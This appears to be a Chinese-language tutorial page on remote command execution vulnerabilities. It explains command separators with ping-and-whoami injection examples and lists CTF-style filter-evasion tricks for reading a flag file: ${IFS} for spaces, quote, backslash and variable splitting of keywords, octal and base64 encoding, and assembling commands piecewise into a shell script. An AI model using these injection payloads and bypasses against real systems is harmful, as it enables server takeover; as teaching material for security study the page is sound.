远程命令执行漏洞

前言

什么是RCE漏洞

RCE, 英文全称为remote command execute, 即远程命令执行

RCE漏洞通常出现在应用程序中,当设计者提供远程命令操作接口时可能会导致漏洞的产生。例如,在web管理界面中提供ping操作,如果在设计功能时没有进行严格的安全控制,则攻击者可能会通过该接口提交"意想不到"的命令并导致后台执行,从而控制整个后台服务器。

RCE漏洞的危害

RCE漏洞是一种严重的安全漏洞,因为它允许攻击者在目标系统上执行任意代码。这意味着攻击者可以在受害者系统上运行恶意软件、篡改数据、获取敏感信息等。如果攻击者利用 RCE 漏洞成功入侵目标系统,可能会对目标系统造成严重的损害

了解命令连接符

不同连接符的含义

在Windows和Linux中有四种命令连接符, 分别是|||&&&。通常来讲, 远程命令执行漏洞的利用, 离不开命令连接符的使用

连接符
描述

`a

b`

`a

b`

a & b

不管a命令是否执行成功, 都会去执行b命令

a && b

若a命令执行成功, 才会执行b命令 若a命令执行失败, 则不执行b命令

使用实例

a | b

ping 127.0.0.1 | whoami #前面命令执行成功,执行后面命令
image-20230104153238637
ping a.b.c.d | whoami #前面命令执行失败,依旧执行后面命令
image-20230104154449259

a || b

ping 127.0.0.1 || whoami  #前面命令执行成功,不执行后面命令
image-20230104153420492
ping a.b.c.d || whoami #前面命令执行失败,执行后面命令
image-20230104153543877

a & b

ping 127.0.0.1 & whoami #前面命令执行成功,执行后面命令
image-20230104153905807
ping a.b.c.d & whoami #前面命令执行失败,依旧执行后面命令
image-20230104154135223

a && b

ping 127.0.0.1 && whoami #前面的命令执行成功,执行后面的命令
image-20230104154809896
ping a.b.c.d && whoami  #前面的命令执行失败,不执行后面的命令
image-20230104154818156

绕过技巧

1.空格被过滤

${IFS}代替空格

${IFS}是一个特殊的变量,其值为"内部字段分隔符"(Internal Field Separator)。通常在bash中,IFS的值为空格、制表符和换行符

cat${IFS}flag.txt
image-20230104163832268

$IFS$8代替空格

$8表示传递的第8个参数

cat$IFS$8flag.txt
image-20230104165716430

重定向符号<或者<>

cat<>flag.txt
cat<flag.txt
image-20230104214338358

2.关键字被过滤

例如关键字cat被过滤了

变量拼接关键字

a=ca;b=t;$a$b flag.txt
image-20230104215135347

单双引号拼接关键字

ca't' flag.txt
c""at flag.txt
image-20230104215929988

使用单双引号的时候, 要注意闭合, 若不闭合的话就会导致命令失效, 例如下面这个例子

image-20230104220013436

反斜杠拼接关键字

c\at fl\ag.txt
image-20230104221841026

$num$@拼接关键字

c$1at [email protected]
image-20230104222156668

3.读取文件常用命令

cat命令被过滤掉了, 可以使用其他命令来读取文件内容, 例如下面表格所示

读取文件命令
描述

more flag.txt

一页一页显示文件内容

less flag.txt

与more命令不同的是, more命令只能往后翻页, 而less命令往前往后都可以

head flag.txt

显示文件内容前几行

tac flag.txt

tac与cat命令刚好相反,文件内容从最后一行开始显示

tail flag.txt

显示文件内容后几行

4.内敛执行绕过

使用``和$()来执行命令,例如下面命令所示

`echo 'cat flag.txt'`
image-20230105113559387
$(echo 'cat flag.txt')
image-20230105113700344

5.编码绕过

八进制编码

在如下命令中, \143\141\164表示字符"c"、"a"和"t",\040表示空格, \056表示".", \164\170\164表示字符"t"、"x"和"t", 也就是说, 下面这条命令是对"cat flag.txt"进行八进制编码

$(printf "\143\141\164\040\146\154\141\147\056\164\170\164")
image-20230104221333820

base64编码

在如下命令中, "cat flag.txt"的base64编码为"Y2F0IGZsYWcudHh0Cg=="

`echo 'Y2F0IGZsYWcudHh0Cg==' | base64 -d`
image-20230105113019785

6.长度限制绕过

使用变量拼接

[herry@henry ~]$ a='ca'
[herry@henry ~]$ b='t'
[herry@henry ~]$ c='fl'
[herry@henry ~]$ d='ag'
[herry@henry ~]$ e='.txt'
[herry@henry ~]$ q=$a$b
[herry@henry ~]$ p=$c$d$e
[herry@henry ~]$ $q $p
Nice job!

写入Shell

可使用反斜杠\来实现换行, 以此实现拼接命令的效果, 如下命令所示

[herry@henry ~]$ ca\
> t \
> flag\
> .txt
Nice job!

依次往shell文件写入命令, 随后执行shell

[herry@henry ~]$ echo 'ca\'>shell
[herry@henry ~]$ echo 't \'>>shell
[herry@henry ~]$ echo 'flag\'>>shell
[herry@henry ~]$ echo '.txt'>>shell
[herry@henry ~]$ sh shell
Nice job!
上一页基本漏洞利用下一页sql注入

最后更新于